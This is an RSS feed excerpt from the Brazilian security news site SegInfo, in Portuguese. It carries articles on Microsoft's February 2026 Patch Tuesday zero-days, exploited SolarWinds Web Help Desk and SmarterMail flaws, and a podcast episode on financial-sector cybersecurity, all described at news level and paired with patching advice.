<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="559" src="https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1697620840-1024x559.jpeg" alt="" class="wp-image-74337" style="aspect-ratio:1.8318737860769414;width:754px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1697620840-1024x559.jpeg 1024w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1697620840-300x164.jpeg 300w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1697620840-150x82.jpeg 150w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1697620840-768x419.jpeg 768w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1697620840-1536x838.jpeg 1536w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1697620840-2048x1117.jpeg 2048w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1697620840-1170x638.jpeg 1170w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1697620840-1877x1024.jpeg 1877w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1697620840-880x480.jpeg 880w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">A Microsoft liberou nesta terça-feira (Patch Tuesday) um pacote de atualizações de segurança para corrigir 59 vulnerabilidades em seus produtos, incluindo seis falhas classificadas como zero-day que já vinham sendo exploradas ativamente.</p>



<p class="wp-block-paragraph">Do total de vulnerabilidades corrigidas, cinco foram classificadas como <strong>Críticas</strong>, 52 como <strong>Importantes</strong> e duas como <strong>Moderadas</strong>. Entre as categorias mais recorrentes estão:</p>



<ul class="wp-block-list">
<li>&#8211; Elevação de privilégio (25)</li>



<li>&#8211; Execução remota de código (12)</li>



<li>&#8211; Falsificação (spoofing) (7)</li>



<li>&#8211; Divulgação de informações (6)</li>



<li>&#8211; Bypass de recursos de segurança (5)</li>



<li>&#8211; Negação de serviço (3)</li>



<li>&#8211; Cross-site scripting – XSS (1)</li>
</ul>



<p class="wp-block-paragraph">As atualizações também complementam três falhas já corrigidas no navegador Edge desde o Patch Tuesday de janeiro de 2026, incluindo uma vulnerabilidade moderada no Edge para Android (CVE-2026-0391, CVSS 6.5), que poderia permitir spoofing via rede por meio de uma representação enganosa de informações críticas na interface do usuário.</p>



<h2 id="h-seis-zero-days-exploradas-ativamente" class="wp-block-heading">Seis zero-days exploradas ativamente</h2>



<p class="wp-block-paragraph">As principais preocupações deste mês envolvem seis vulnerabilidades já exploradas no mundo real:</p>



<ul class="wp-block-list">
<li>• <strong>CVE-2026-21510 (CVSS 8.8)</strong> – Falha no Windows Shell que permite a um atacante não autorizado contornar um recurso de segurança via rede.</li>



<li>• <strong>CVE-2026-21513 (CVSS 8.8)</strong> – Falha no MSHTML Framework que possibilita o bypass de mecanismo de proteção por meio de interação com arquivos maliciosos.</li>



<li>• <strong>CVE-2026-21514 (CVSS 7.8)</strong> – Uso de entradas não confiáveis em decisões de segurança no Microsoft Office Word, permitindo contornar proteções localmente.</li>



<li>• <strong>CVE-2026-21519 (CVSS 7.8)</strong> – Vulnerabilidade de “type confusion” no Desktop Window Manager que possibilita elevação de privilégio local.</li>



<li>• <strong>CVE-2026-21525 (CVSS 6.2)</strong> – Null pointer dereference no Windows Remote Access Connection Manager que pode resultar em negação de serviço local.</li>



<li>• <strong>CVE-2026-21533 (CVSS 7.8)</strong> – Gerenciamento inadequado de privilégios no Windows Remote Desktop, permitindo elevação de privilégio local.</li>
</ul>



<p class="wp-block-paragraph">As três primeiras falhas foram identificadas por equipes internas da Microsoft e pelo Google Threat Intelligence Group (GTIG), sendo listadas como publicamente conhecidas no momento da divulgação. Até o momento, não há detalhes sobre como as vulnerabilidades estão sendo exploradas nem se fazem parte de uma mesma campanha.</p>



<h2 id="h-similaridades-tecnicas-e-riscos" class="wp-block-heading">Similaridades técnicas e riscos</h2>



<p class="wp-block-paragraph">Especialistas apontaram que as falhas CVE-2026-21513 e CVE-2026-21514 apresentam grande similaridade com a CVE-2026-21510. A principal diferença é o vetor de exploração:</p>



<ul class="wp-block-list">
<li>• A <strong>CVE-2026-21513</strong> pode ser explorada por meio de arquivos HTML.</li>



<li>• A <strong>CVE-2026-21514</strong> exige um arquivo do Microsoft Office.</li>
</ul>



<p class="wp-block-paragraph">No caso da CVE-2026-21513, a falha afeta o MSHTML, componente central do Windows responsável por renderizar conteúdo HTML. Um arquivo especialmente criado pode contornar avisos de segurança do sistema e disparar ações perigosas com apenas um clique.</p>



<p class="wp-block-paragraph">Já as vulnerabilidades <strong>CVE-2026-21519</strong> e <strong>CVE-2026-21533</strong> exigem que o invasor já tenha acesso prévio à máquina comprometida. Esse acesso pode ocorrer por meio de anexo malicioso, exploração de execução remota de código ou movimentação lateral dentro da rede.</p>



<p class="wp-block-paragraph">Uma vez no sistema, o atacante pode escalar privilégios até o nível <strong>SYSTEM</strong>, o que permitiria desabilitar ferramentas de segurança, implantar novos malwares ou, em cenários mais graves, acessar credenciais sensíveis e comprometer todo o domínio.</p>



<p class="wp-block-paragraph">A CrowdStrike, que reportou a CVE-2026-21533, informou que o exploit modifica chaves de configuração de serviço, substituindo-as por chaves controladas pelo invasor — o que pode permitir a criação de novos usuários no grupo de Administradores.</p>



<h2 id="h-cisa-inclui-falhas-no-catalogo-kev" class="wp-block-heading">CISA inclui falhas no catálogo KEV</h2>



<p class="wp-block-paragraph">Diante da exploração ativa, a Agência de Segurança Cibernética e Infraestrutura dos EUA (CISA) adicionou as seis vulnerabilidades ao catálogo de Vulnerabilidades Exploradas Conhecidas (KEV).</p>



<p class="wp-block-paragraph">Com isso, agências do governo federal norte-americano (FCEB) devem aplicar as correções até <strong>3 de março de 2026</strong>.</p>



<h2 id="h-atualizacao-de-certificados-do-secure-boot" class="wp-block-heading">Atualização de certificados do Secure Boot</h2>



<p class="wp-block-paragraph">O pacote também coincide com a distribuição de novos certificados do Secure Boot, substituindo os certificados originais de 2011, que expiram no fim de junho de 2026.</p>



<p class="wp-block-paragraph">Os novos certificados serão instalados automaticamente via Windows Update. Caso o dispositivo não receba a atualização antes da expiração:</p>



<ul class="wp-block-list">
<li>• O sistema continuará funcionando normalmente;</li>



<li>• Softwares já instalados continuarão operando;</li>



<li>• Contudo, o equipamento entrará em um estado degradado de segurança, com limitação para receber futuras proteções em nível de boot.</li>
</ul>



<p class="wp-block-paragraph">Com o tempo, isso pode resultar em maior exposição a vulnerabilidades recém-descobertas e até problemas de compatibilidade com novos sistemas operacionais, firmwares e softwares que dependem do Secure Boot.</p>



<h2 id="h-reforco-nas-protecoes-padrao-do-windows" class="wp-block-heading">Reforço nas proteções padrão do Windows</h2>



<p class="wp-block-paragraph">A Microsoft também anunciou duas iniciativas para fortalecer as proteções padrão do Windows:</p>



<h3 id="h-windows-baseline-security-mode" class="wp-block-heading">Windows Baseline Security Mode</h3>



<p class="wp-block-paragraph">Permitirá que o sistema opere, por padrão, com salvaguardas de integridade em tempo de execução, garantindo que apenas aplicativos, serviços e drivers devidamente assinados possam ser executados.</p>



<h3 id="h-user-transparency-and-consent" class="wp-block-heading">User Transparency and Consent</h3>



<p class="wp-block-paragraph">Inspirado no modelo de Transparência, Consentimento e Controle (TCC) do macOS, o recurso introduz uma abordagem mais consistente para decisões de segurança. O Windows passará a exibir avisos claros quando aplicativos tentarem acessar recursos sensíveis — como arquivos, câmera e microfone — ou instalar softwares adicionais.</p>



<p class="wp-block-paragraph">Segundo a Microsoft, aplicativos e agentes de IA também deverão atender a padrões mais elevados de transparência, oferecendo maior visibilidade tanto para usuários quanto para administradores de TI.</p>



<h2 id="h-atencao-redobrada-das-equipes-de-seguranca" class="wp-block-heading">Atenção redobrada das equipes de segurança</h2>



<p class="wp-block-paragraph">A presença de seis zero-days exploradas ativamente reforça a importância de aplicar as atualizações o mais rápido possível, especialmente em ambientes corporativos.</p>



<p class="wp-block-paragraph">Organizações devem priorizar:</p>



<ul class="wp-block-list">
<li><strong>• Atualização imediata de sistemas Windows e Office;</strong></li>



<li><strong>• Monitoramento de possíveis tentativas de exploração;</strong></li>



<li><strong>• Revisão de privilégios administrativos;</strong></li>



<li><strong>• Verificação da aplicação correta dos novos certificados de Secure Boot.</strong></li>
</ul>



<p class="wp-block-paragraph">Em um cenário de ameaças cada vez mais sofisticadas, a gestão eficiente de patches continua sendo uma das principais camadas de defesa contra ataques cibernéticos.</p>



<p class="wp-block-paragraph">Para saber mais, clique <strong><a href="https://thehackernews.com/2026/02/microsoft-patches-59-vulnerabilities.html" target="_blank" rel="noreferrer noopener nofollow">aqui</a></strong>.</p>
<p>The post <a href="https://seginfo.com.br/2026/02/13/microsoft-corrige-59-vulnerabilidades-incluindo-seis-zero-days-exploradas-ativamente/">Microsoft corrige 59 vulnerabilidades, incluindo seis zero-days exploradas ativamente</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">74334</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>SegInfocast #91 – Instituições financeiras na mira: cibersegurança como habilitadora de negócios</title>
		<link>https://seginfo.com.br/2026/02/11/seginfocast-91-instituicoes-financeiras-na-mira-ciberseguranca-como-habilitadora-de-negocios/</link>
		
		
		<pubDate>Wed, 11 Feb 2026 20:56:25 +0000</pubDate>
				<category><![CDATA[Seginfo Podcast]]></category>
		<category><![CDATA[SegInfocast]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=74323</guid>

					<description><![CDATA[<p>Seginfocast &#8211; Podcast em Segurança da Informação · SegInfocast #91 &#8211; Instituições financeiras na mira &#8211; a cibersegurança como habilitadora de negócios Neste episódio do SegInfocast, recebemos Felipe Negri, CEO e sócio do PinBank, para uma conversa direta sobre os desafios do mercado financeiro em um cenário cada vez mais regulado, digital e exposto a&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2026/02/11/seginfocast-91-instituicoes-financeiras-na-mira-ciberseguranca-como-habilitadora-de-negocios/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2026/02/11/seginfocast-91-instituicoes-financeiras-na-mira-ciberseguranca-como-habilitadora-de-negocios/">SegInfocast #91 &#8211; Instituições financeiras na mira: cibersegurança como habilitadora de negócios</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<iframe width="100%" height="166" scrolling="no" frameborder="no" allow="autoplay" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/soundcloud%253Atracks%253A2263811696&#038;color=%23ff5500&#038;auto_play=false&#038;hide_related=false&#038;show_comments=true&#038;show_user=true&#038;show_reposts=false&#038;show_teaser=true"></iframe><div style="font-size: 10px; color: #cccccc;line-break: anywhere;word-break: normal;overflow: hidden;white-space: nowrap;text-overflow: ellipsis; font-family: Interstate,Lucida Grande,Lucida Sans Unicode,Lucida Sans,Garuda,Verdana,Tahoma,sans-serif;font-weight: 100;"><a href="https://soundcloud.com/seginfocast" title="Seginfocast - Podcast em Segurança da Informação" target="_blank" style="color: #cccccc; text-decoration: none;">Seginfocast &#8211; Podcast em Segurança da Informação</a> · <a href="https://soundcloud.com/seginfocast/seginfocast-91-instituic-o-es" title="SegInfocast #91 - Instituições financeiras na mira - a cibersegurança como habilitadora de negócios" target="_blank" style="color: #cccccc; text-decoration: none;">SegInfocast #91 &#8211; Instituições financeiras na mira &#8211; a cibersegurança como habilitadora de negócios</a></div>



<p class="wp-block-paragraph">Neste episódio do SegInfocast, recebemos Felipe Negri, CEO e sócio do PinBank, para uma conversa direta sobre os desafios do mercado financeiro em um cenário cada vez mais regulado, digital e exposto a riscos cibernéticos.</p>



<p class="wp-block-paragraph">Ao longo do episódio, falamos sobre:<br>Inovação no setor financeiro e o papel das instituições;<br>Regulação do Banco Central como ponto de partida, não como fim;<br>Banking as a Service e a importância de manter foco no core do negócio;<br>Cibersegurança como ativo estratégico e diferencial competitivo;<br>Inteligência artificial, identidade e novos riscos cibernéticos.</p>



<p class="wp-block-paragraph">Quer entender como preparar sua empresa para as novas exigências do Banco Central sem perder agilidade e inovação?<br>Acesse nosso conteúdo sobre adequação: <a href="https://clavis.com.br/lp-ebook-bacen-1/" rel="nofollow">https://clavis.com.br/lp-ebook-bacen-1/</a></p>
<p>The post <a href="https://seginfo.com.br/2026/02/11/seginfocast-91-instituicoes-financeiras-na-mira-ciberseguranca-como-habilitadora-de-negocios/">SegInfocast #91 &#8211; Instituições financeiras na mira: cibersegurança como habilitadora de negócios</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">74323</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>Falhas recentes no SolarWinds podem ter sido exploradas como zero-days, alerta Microsoft</title>
		<link>https://seginfo.com.br/2026/02/09/falhas-recentes-no-solarwinds-podem-ter-sido-exploradas-como-zero-days-alerta-microsoft/</link>
		
		
		<pubDate>Mon, 09 Feb 2026 18:57:36 +0000</pubDate>
				<category><![CDATA[Uncategorized]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=74281</guid>

					<description><![CDATA[<p>A Microsoft alertou que ataques direcionados a instâncias do SolarWinds Web Help Desk (WHD) expostas à internet podem ter explorado vulnerabilidades recém-corrigidas como zero-days, permitindo o acesso inicial dos invasores aos ambientes afetados. De acordo com a empresa, os ataques fizeram parte de uma intrusão em múltiplas etapas observada em dezembro de 2025, na qual&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2026/02/09/falhas-recentes-no-solarwinds-podem-ter-sido-exploradas-como-zero-days-alerta-microsoft/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2026/02/09/falhas-recentes-no-solarwinds-podem-ter-sido-exploradas-como-zero-days-alerta-microsoft/">Falhas recentes no SolarWinds podem ter sido exploradas como zero-days, alerta Microsoft</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" width="5472" height="3648" src="https://seginfo.com.br/wp-content/uploads/2026/02/imagem-seginfo-09.02.26.png" alt="" class="wp-image-74287" style="aspect-ratio:1.5000418538463685;width:660px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2026/02/imagem-seginfo-09.02.26.png 5472w, https://seginfo.com.br/wp-content/uploads/2026/02/imagem-seginfo-09.02.26-300x200.png 300w, https://seginfo.com.br/wp-content/uploads/2026/02/imagem-seginfo-09.02.26-1024x683.png 1024w, https://seginfo.com.br/wp-content/uploads/2026/02/imagem-seginfo-09.02.26-150x100.png 150w, https://seginfo.com.br/wp-content/uploads/2026/02/imagem-seginfo-09.02.26-768x512.png 768w, https://seginfo.com.br/wp-content/uploads/2026/02/imagem-seginfo-09.02.26-1536x1024.png 1536w, https://seginfo.com.br/wp-content/uploads/2026/02/imagem-seginfo-09.02.26-2048x1365.png 2048w, https://seginfo.com.br/wp-content/uploads/2026/02/imagem-seginfo-09.02.26-1170x780.png 1170w, https://seginfo.com.br/wp-content/uploads/2026/02/imagem-seginfo-09.02.26-720x480.png 720w" sizes="(max-width: 5472px) 100vw, 5472px" /></figure>
</div>


<p class="wp-block-paragraph">A Microsoft alertou que ataques direcionados a instâncias do <strong>SolarWinds Web Help Desk (WHD)</strong> expostas à internet podem ter explorado <strong>vulnerabilidades recém-corrigidas como zero-days</strong>, permitindo o acesso inicial dos invasores aos ambientes afetados.</p>



<p class="wp-block-paragraph">De acordo com a empresa, os ataques fizeram parte de uma <strong>intrusão em múltiplas etapas observada em dezembro de 2025</strong>, na qual agentes maliciosos comprometeram implantações vulneráveis do WHD para executar comandos PowerShell, baixar e executar cargas adicionais no ambiente.</p>



<p class="wp-block-paragraph">Apesar da investigação, a Microsoft afirma que <strong>não foi possível confirmar com precisão quais vulnerabilidades foram exploradas</strong>, já que os sistemas comprometidos estavam vulneráveis tanto a falhas antigas quanto a falhas mais recentes do SolarWinds conhecidas por serem exploradas ativamente.</p>



<h3 id="h-vulnerabilidades-envolvidas" class="wp-block-heading">Vulnerabilidades envolvidas</h3>



<p class="wp-block-paragraph">Segundo a análise, o produto comprometido apresentava falhas associadas aos seguintes CVEs:</p>



<ul class="wp-block-list">
<li>• <strong><a href="https://nvd.nist.gov/vuln/detail/cve-2025-40551" target="_blank" rel="noreferrer noopener">CVE-2025-40551</a></strong> e <strong><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-40536" target="_blank" rel="noreferrer noopener nofollow">CVE-2025-40536</a></strong>, corrigidos em janeiro de 2026;</li>



<li>• <strong><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-26399" target="_blank" rel="noreferrer noopener nofollow">CVE-2025-26399</a></strong>, corrigido em setembro de 2025.</li>
</ul>



<p class="wp-block-paragraph">A vulnerabilidade <strong>CVE-2025-26399</strong> é descrita como uma falha de <strong>execução remota de código (RCE) não autenticada via deserialização no componente AjaxProxy</strong>. Essa falha foi divulgada como um bypass de correções anteriores, relacionadas aos CVEs <strong><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-28988" target="_blank" rel="noreferrer noopener nofollow">CVE-2024-28988</a></strong> e <strong><a href="https://nvd.nist.gov/vuln/detail/cve-2024-28986" target="_blank" rel="noreferrer noopener nofollow">CVE-2024-28986</a></strong>.</p>



<p class="wp-block-paragraph">Já a <strong>CVE-2025-40551</strong> tem a mesma raiz no componente AjaxProxy e também permite <strong>RCE não autenticada por deserialização de dados não confiáveis</strong>. Essa vulnerabilidade foi adicionada recentemente ao <strong>catálogo de vulnerabilidades exploradas ativamente (KEV) da CISA</strong>, reforçando seu nível de criticidade.</p>



<p class="wp-block-paragraph">A <strong>CVE-2025-40536</strong>, por sua vez, consiste em um <strong>bypass de controles de segurança</strong>, que pode permitir a criação de instâncias válidas do AjaxProxy, viabilizando a exploração da CVE-2025-40551 para execução remota de código.</p>



<p class="wp-block-paragraph">“Como os ataques ocorreram em dezembro de 2025 e os sistemas estavam vulneráveis tanto aos CVEs antigos quanto aos novos simultaneamente, não é possível confirmar de forma confiável qual vulnerabilidade foi usada para obter o acesso inicial”, destacou a Microsoft.</p>



<h3 id="h-tecnicas-de-persistencia-e-movimentacao-lateral" class="wp-block-heading">Técnicas de persistência e movimentação lateral</h3>



<p class="wp-block-paragraph">Após o comprometimento inicial, os atacantes foram observados obtendo <strong>persistência no ambiente</strong> por meio da implantação da ferramenta legítima de <strong>monitoramento e gerenciamento remoto (RMM) ManageEngine</strong>, além do estabelecimento de acessos reversos via <strong>SSH e RDP</strong>.</p>



<p class="wp-block-paragraph">Também foi identificado o uso de uma <strong>tarefa agendada</strong> para iniciar uma máquina virtual <strong>QEMU com privilégios de sistema</strong>, explorando o ambiente virtualizado como técnica de evasão e para acesso SSH via encaminhamento de portas.</p>



<p class="wp-block-paragraph">Em alguns casos, os invasores utilizaram <strong>DLL sideloading</strong> para acessar a memória do <strong>LSASS</strong>, com o objetivo de roubar credenciais. Credenciais de alto privilégio também foram empregadas em ataques do tipo <strong>DCSync</strong>, permitindo a solicitação de dados de senhas diretamente a controladores de domínio.</p>



<h3 id="h-recomendacoes-de-mitigacao" class="wp-block-heading">Recomendações de mitigação</h3>



<p class="wp-block-paragraph">A Microsoft recomenda que as organizações:</p>



<ul class="wp-block-list">
<li>• <strong>Atualizem imediatamente</strong> as instâncias do SolarWinds Web Help Desk;</li>



<li><strong>• Identifiquem e removam</strong> aplicações RMM não autorizadas;</li>



<li><strong>• Realizem a rotação de credenciais</strong> potencialmente comprometidas;</li>



<li><strong>• Isolem hosts afetados</strong> para conter a propagação do ataque.</li>
</ul>



<p class="wp-block-paragraph">Segundo a empresa, o incidente reforça um padrão recorrente e de alto impacto:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="wp-block-paragraph">“Uma única aplicação exposta pode abrir caminho para o comprometimento completo do domínio quando vulnerabilidades não são corrigidas ou monitoradas adequadamente. Nesta intrusão, os atacantes recorreram fortemente a técnicas de <em>living off the land</em>, ferramentas administrativas legítimas e mecanismos de persistência de baixo ruído”, conclui a Microsoft.</p>



<p class="wp-block-paragraph">Para saber mais, clique <strong><a href="https://www.securityweek.com/recent-solarwinds-flaws-potentially-exploited-as-zero-days/" target="_blank" rel="noreferrer noopener nofollow">aqui</a></strong>.</p>
</blockquote>
<p>The post <a href="https://seginfo.com.br/2026/02/09/falhas-recentes-no-solarwinds-podem-ter-sido-exploradas-como-zero-days-alerta-microsoft/">Falhas recentes no SolarWinds podem ter sido exploradas como zero-days, alerta Microsoft</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">74281</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>Vulnerabilidade crítica no SmarterMail é explorada em ataques de ransomware</title>
		<link>https://seginfo.com.br/2026/02/06/vulnerabilidade-critica-no-smartermail-e-explorada-em-ataques-de-ransomware/</link>
		
		
		<pubDate>Fri, 06 Feb 2026 20:39:49 +0000</pubDate>
				<category><![CDATA[Uncategorized]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=74247</guid>

					<description><![CDATA[<p>Uma vulnerabilidade crítica nos servidores de e-mail corporativo e colaboração SmarterTools SmarterMail está sendo ativamente explorada por cibercriminosos, segundo alerta da agência de segurança cibernética dos Estados Unidos, a CISA. Há cerca de duas semanas, pesquisadores de segurança já haviam identificado a exploração de uma falha de bypass de autenticação no SmarterMail, utilizada por atacantes&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2026/02/06/vulnerabilidade-critica-no-smartermail-e-explorada-em-ataques-de-ransomware/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2026/02/06/vulnerabilidade-critica-no-smartermail-e-explorada-em-ataques-de-ransomware/">Vulnerabilidade crítica no SmarterMail é explorada em ataques de ransomware</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="574" src="https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_813797530-1024x574.jpeg" alt="" class="wp-image-74249" style="width:742px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_813797530-1024x574.jpeg 1024w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_813797530-300x168.jpeg 300w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_813797530-150x84.jpeg 150w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_813797530-768x430.jpeg 768w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_813797530-1536x861.jpeg 1536w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_813797530-2048x1148.jpeg 2048w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_813797530-1170x656.jpeg 1170w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_813797530-1827x1024.jpeg 1827w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_813797530-856x480.jpeg 856w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">Uma vulnerabilidade crítica nos servidores de e-mail corporativo e colaboração <strong>SmarterTools SmarterMail</strong> está sendo ativamente explorada por cibercriminosos, segundo alerta da agência de segurança cibernética dos Estados Unidos, a <strong>CISA</strong>.</p>



<p class="wp-block-paragraph">Há cerca de duas semanas, pesquisadores de segurança já haviam identificado a exploração de uma falha de <em>bypass</em> de autenticação no SmarterMail, utilizada por atacantes para redefinir senhas de contas administrativas e assumir o controle de instâncias vulneráveis. Na semana passada, a CISA incluiu essa falha em seu catálogo de <strong>Known Exploited Vulnerabilities (KEV)</strong>, juntamente com um segundo problema explorado na mesma campanha.</p>



<p class="wp-block-paragraph">Agora, a agência emitiu um novo alerta informando que uma <strong>terceira vulnerabilidade</strong> no SmarterMail também está sendo explorada ativamente. A falha é identificada como <strong>CVE-2026-24423</strong>, possui pontuação <strong>CVSS 9.3</strong> e permite <strong>execução remota de código (RCE) sem autenticação</strong>, por meio da API <em>ConnectToHub</em>.</p>



<p class="wp-block-paragraph">De acordo com a descrição técnica, a API processa requisições controladas por um servidor remoto, o que possibilita que atacantes definam parâmetros arbitrários de execução de comandos. Esses parâmetros são então repassados ao endpoint vulnerável, resultando na execução de comandos no sistema afetado, independentemente da plataforma.</p>



<p class="wp-block-paragraph">Segundo um alerta do NIST, um invasor pode direcionar o SmarterMail para um servidor HTTP malicioso, que retorna um comando de sistema operacional fraudulento. Esse comando é executado automaticamente pela aplicação vulnerável.</p>



<p class="wp-block-paragraph">A empresa VulnCheck aponta que a causa raiz do problema está no fato de a API <em>ConnectToHub</em> permitir explicitamente usuários anônimos e processar dados JSON enviados via requisições POST. Com isso, atacantes podem definir comandos de <em>mount</em> com parâmetros maliciosos e, ao executá-los, elevar privilégios em sistemas Linux.</p>



<p class="wp-block-paragraph">Em <strong>15 de janeiro</strong>, a SmarterTools lançou o <strong>build 9511 do SmarterMail</strong>, que corrige a CVE-2026-24423 e as duas vulnerabilidades anteriores já exploradas. A recomendação é que as organizações atualizem suas instâncias <strong>o quanto antes</strong>.</p>



<p class="wp-block-paragraph">Na última quinta-feira, a CISA adicionou oficialmente a CVE-2026-24423 ao catálogo KEV e determinou que agências federais realizem a correção até <strong>26 de fevereiro</strong>, alertando que a falha já está sendo utilizada por <strong>grupos de ransomware</strong>.</p>



<p class="wp-block-paragraph">A agência também definiu um prazo semelhante para a correção da <strong>CVE-2025-11953</strong>, uma vulnerabilidade crítica de injeção de comandos no React Native, explorada ativamente desde dezembro.</p>



<p class="wp-block-paragraph">Para saber mais, clique <strong><a href="https://www.securityweek.com/critical-smartermail-vulnerability-exploited-in-ransomware-attacks/" target="_blank" rel="noreferrer noopener nofollow">aqui</a></strong>.</p>
<p>The post <a href="https://seginfo.com.br/2026/02/06/vulnerabilidade-critica-no-smartermail-e-explorada-em-ataques-de-ransomware/">Vulnerabilidade crítica no SmarterMail é explorada em ataques de ransomware</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">74247</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>Ataque à atualização do Notepad++ é atribuído ao grupo de espionagem Lotus Blossom</title>
		<link>https://seginfo.com.br/2026/02/05/ataque-a-atualizacao-do-notepad-e-atribuido-ao-grupo-de-espionagem-lotus-blossom/</link>
		
		
		<pubDate>Thu, 05 Feb 2026 19:10:17 +0000</pubDate>
				<category><![CDATA[Uncategorized]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=74230</guid>

					<description><![CDATA[<p>Pesquisadores de segurança identificaram que o recente comprometimento do mecanismo de atualização do Notepad++ está associado a uma operação de ciberespionagem conduzida pelo grupo conhecido como Lotus Blossom, também rastreado por outras comunidades de pesquisa como Lotus Panda ou Billbug. O incidente chama atenção por explorar a cadeia de distribuição de software como vetor inicial&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2026/02/05/ataque-a-atualizacao-do-notepad-e-atribuido-ao-grupo-de-espionagem-lotus-blossom/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2026/02/05/ataque-a-atualizacao-do-notepad-e-atribuido-ao-grupo-de-espionagem-lotus-blossom/">Ataque à atualização do Notepad++ é atribuído ao grupo de espionagem Lotus Blossom</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="640" src="https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1866504219-1024x640.jpeg" alt="" class="wp-image-74233" style="aspect-ratio:1.598477640342531;width:704px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1866504219-1024x640.jpeg 1024w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1866504219-300x188.jpeg 300w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1866504219-150x94.jpeg 150w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1866504219-768x480.jpeg 768w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1866504219-1536x960.jpeg 1536w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1866504219-2048x1281.jpeg 2048w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1866504219-1170x732.jpeg 1170w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1866504219-1638x1024.jpeg 1638w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


